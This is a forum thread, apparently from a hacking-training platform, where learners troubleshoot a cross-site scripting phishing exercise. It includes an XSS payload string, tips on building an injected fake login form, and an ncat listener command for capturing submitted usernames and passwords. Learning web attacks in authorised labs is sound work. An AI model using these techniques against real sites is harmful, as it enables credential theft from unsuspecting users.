Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

HTB Content Academy
45

So I tried the phishing section for the XSS module without walking through most of the examples. Spent several hours trying to figure out why in the heck my payload worked locally(I could see username and password upon logging in), but NOT with ‘/send.php’.

For whatever reason, I did NOT put ‘name=“submit”’ for “input type=“submit”” in the payload. It makes sense why this works locally; the index.php script being used is looking for ‘username’ and ‘password’ fields via the isset() function. I’m pretty sure ‘/send.php’ is looking for “submit” as a conditional. I might be wrong about this, but it makes sense.

tldr: just copy the html form presented via the top of the page. Make sure each field, including the button, is named.

46

complete solution to this challenge - How to Exploit Reflected XSS: The "Surprising" Trick! - YouTube
hope it helps :))

1 Like
47

image
image958×347 12.7 KB

insert to XSS above to http://IP_target/phishing/index.php
and then get result URL

send to http://10.129.xx.xxx/phishing/send.php
before send go to cmd type
ncat -lvnp 8090
you will see user name password via cmd

2 Likes
48

im beyond annoyed with this section

49

I’m getting the same error. I am using http instead of https. Can you help me please?

50

I have it working and I also have the flag based on all the discussions on this forum.

Though there is one thing I do not understand.

When one runs XSStrike against the phishing/index.php one of the possible payloads is below.
'><DETaIls%09onPoinTerEnTEr%0d=%0d(confirm)()%0dx//

Let’s say I submit a parameter test the URL is:
http://10.129.193.135/phishing/index.php?url=test

The source then looks like below.

Based on the XSS payload we know that we need to start our XSS injection payload with '>

Then let’s submit ‘>test and the source looks like.
’>

to make this clearer let’s group this like below:
'>

So essentially by adding the '> as input we complete the img src tag.

So, I would think then in the final payload when doing the assignment one also would use the '>
But in all of these discussions all the sudden one needs to use '/>

Where does the / come from?
Why is the / needed?

Thanks

51

The forum application system removed the most important info.

Below is an image that shows the source when submitting test
image
http://10.129.193.135/phishing/index.php?url=test

Below is an image that shows the source when submitting '>test
image
http://10.129.193.135/phishing/index.php?url=>'test

So, in the solution, there the '> becomes '/>.
Whys is that?

52

My problem here was that i used proton vpn to access the website as soon as i turned it off i got the url sent.

53

thanks for the help!

54

It is foundamental that you write the HTML part as in the example. The placeholders have to be “Username” and “Password” otherwise the send.php page will not work. The names of the elements have to match as well… This was the problem on my side. Hope this helps.